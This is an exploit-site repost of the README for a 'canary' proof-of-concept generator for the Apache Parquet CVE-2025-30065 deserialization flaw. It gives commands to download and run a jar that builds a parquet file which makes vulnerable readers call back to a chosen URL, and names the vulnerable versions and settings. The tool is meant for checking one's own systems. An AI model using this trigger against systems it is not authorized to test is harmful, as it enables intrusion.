Exploit for CVE-2025-30065

Name: Exploit for CVE-2025-30065
Rating: 5 (40 reviews)
2025-04-23 | CVSS 10.0
## https://sploitus.com/exploit?id=618FEDE0-EDE7-5531-9448-C1E5CB52D355
# Canary Exploit for Parquet CVE-2025-30065

```
               (`-.     ('-.
             _(OO  )_ _(  OO)
   .-----,--(_/   ,. (,------.      .-----.  .----.  .-----..------.         .-----.  .----.   .----.   ,--.  .------.
  '  .--.\   \   /(__/|  .---' .-')/ ,-.   \/  ..  \/ ,-.   |   ___|   .-') /  -.   \/  ..  \ /  ..  \ /  .'  |   ___|
  |  |('-.\   \ /   / |  |   _(  OO'-'  |  .  /  \  '-'  |  |  '--.  _(  OO)'-' _'  .  /  \  .  /  \  .  / -. |  '--.
 /_) |OO  )\   '   /,(|  '--(,------. .'  /|  |  '  |  .'  /`---.  '(,------.  |_  <|  |  '  |  |  '  | .-.  '`---.  '.
 ||  |`-'|  \     /__)|  .--''------.'  /__'  \  /  '.'  /__.-   |  |'------.-.  |  '  \  /  '  \  /  ' \  |  .-   |  |
(_'  '--'\   \   /    |  `---.     |       |\  `'  /|       | `-'   /       \ `-'   /\  `'  / \  `'  /\  `'  /| `-'   /
   `-----'    `-'     `------'     `-------' `---'' `-------'`----''         `----''  `---''   `---''  `----'  `----''
         Canary Exploit Generator - https://github.com/F5-Labs/parquet-canary-exploit-rce-poc-CVE-2025-30065
```

The bare minimum (skip the README instructions at your own risk):

```bash
mkdir -p build/libs
curl -o build/libs/parquet_canary_exploit-fat.jar \
     -L https://github.com/F5-Labs/parquet-canary-exploit-rce-poc-CVE-2025-30065/blob/main/build/libs/parquet_canary_exploit-fat.jar
java -jar build/libs/parquet_canary_exploit-fat.jar --mode=generate YOUR_CALLBACK_URL
```

## What it is

Compliance folks? AppSec folks? Vuln Management folks? F5 Labs made this for you. This CVE has a CVSS 10 score which typically means tight turn-around times are needed. We've bundled the tool as a jar file that can generate you a parquet file. You can feed it to your own systems to determine if it is vulnerable - which is helpful both before and after the fix.

Credit for the [internals of this PoC](https://github.com/mouadk/parquet-rce-poc-CVE-2025-30065/blob/main/src/main/java/com/evil/GenerateMaliciousParquetSSRF.java) go to [Mouad Kondah](https://www.deep-kondah.com/author/mouad/). Their [writeup dated 2025-04-07](https://www.deep-kondah.com/parquet-under-fire-a-technical-analysis-of-cve-2025-30065/) discusses this CVE and their PoCs.

## How it Works

The parquet file abuses the behavior in `parquet-avro` that allows for passing an untrusted Java `String` to an arbitrary Java class constructor. You supply the callback URL, and when your system reads the parquet file this will result in a `javax.swing.JEditorPane` object attempting to reach that URL. This is benign.

## Demo Video

Want a quick redux of the canary exploit tool? Watch this two minute YouTube Short for a live demo: [[demo video](https://youtube.com/shorts/vsKv_KayT1E?si=dBTfyIoPKXuXXxT7)].



## Vulnerable Configurations

Note that there are two scenarios for vulnerability F5 Labs is aware of for the `parquet-avro` module:

1. Version 1.15.0 and earlier - as there was no concept of allow-listing packages for coercing `String` objects into alternate types.
2. Version 1.15.1 onwards (at the time of writing) if and only if the setting `org.apache.parquet.avro.SERIALIZABLE_PACKAGES` has been set to something permissive e.g. `*`.

## Gotchas

You can use this with anything that your system can egress to (DNS and/or HTTP(S)). If you do not have egress of either kind to the internet at large, then consider anything that is reachable within your data center for which you can obtain DNS or HTTP access logs. Be advised that getting this wrong will mean a false negative. Highly irregular settings for `org.apache.parquet.avro.SERIALIZABLE_PACKAGES` might conceivably lead to a false negative also, see the previous subsection.

## Using the Canary Exploit Generator

You are encouraged to read and understand the code and build it for yourself. We provide the distribution build of the code as a jar within this repository for your convenience.

### Obtaining the Java JDK

You will need JDK 21 or later to build or run the generator (search terms like "OpenJDK21 install" may help here). If you are familiar with installing the JDK, these are shortcuts:

* MacOS: `brew install openjdk@21`
* Ubuntu/Debian: `sudo apt install openjdk-21-jdk`
* Red Hat: `sudo yum install java-21-openjdk`
* Windows: https://learn.microsoft.com/en-us/java/openjdk/install

### Obtaining the Distribution Jar

You can either download the jar, or clone the repo.

#### Downloading the Distribution Jar

```bash
mkdir -p build/libs
curl -o build/libs/parquet_canary_exploit-fat.jar \
     -L https://github.com/F5-Labs/parquet-canary-exploit-rce-poc-CVE-2025-30065/blob/main/build/libs/parquet_canary_exploit-fat.jar
```

#### Cloning this Github Repository

```bash
git clone https://github.com/F5-Labs/parquet-canary-exploit-rce-poc-CVE-2025-30065.git
cd parquet-canary-exploit-rce-poc-CVE-2025-30065
```

#### Verifying your Distribution Jar

```bash
file build/libs/parquet_canary_exploit-fat.jar
shasum build/libs/parquet_canary_exploit-fat.jar
```

Expected output:

```bash
build/libs/parquet_canary_exploit-fat.jar: Zip archive data, at least v1.0 to extract, compression method=deflate
19ae361d589a9cd476bee31ba3f437094a8a6440  build/libs/parquet_canary_exploit-fat.jar
```

### Get Usage Help

```bash
java -jar build/libs/parquet_canary_exploit-fat.jar -h
```

Expected output:

![](doc/parquet-canary-exploit-rce-poc-CVE-2025-30065-screenshot.png)

### Generate the Canary Exploit File

First, determine what you want `YOUR_CALLBACK_URL` to be. You need to be able to detect when your parquet-processing backend either resolves the domain name of the URL or requests the URL from the web server. You are welcome to consider canarytokens.org "Web bug" or "DNS" for this. See the Gotchas section above for details.

Run this command:

```bash
java -jar build/libs/parquet_canary_exploit-fat.jar --mode=generate YOUR_CALLBACK_URL
```

This will generate `poc.parquet`. Verify like so:

```bash
file poc.parquet
```

This should output:

```bash
poc.parquet: Apache Parquet
```

This file can now be fed into your system. If your system is vulnerable, you will receive a callback. See also the Gotchas section.

### Test the Canary Exploit File

For convenience this will generate the file also if it does not already exist.

```bash
java -jar build/libs/parquet_canary_exploit-fat.jar --mode=test YOUR_CALLBACK_URL
```

### Test the Canary Exploit Locally

```bash
python3 -m http.server --bind 127.0.0.1 9090 &
java -jar build/libs/parquet_canary_exploit-fat.jar --mode=test http://localhost:9090
```

See `CanaryExploitGenerator.testParquetFile()` for how the parquet file is read. This is what code in the depths of your system will look like:

```java
  ParquetReader reader = AvroParquetReader.builder(inputFile).build();
  // enough to trigger the construction of javax.swing.JEditorPane
  Object object = reader.read();
```

## Disclaimer

This tool is intended for use in authorized security testing settings only. Know the laws for applicable jurisdiction(s). See LICENSE.md for legal details.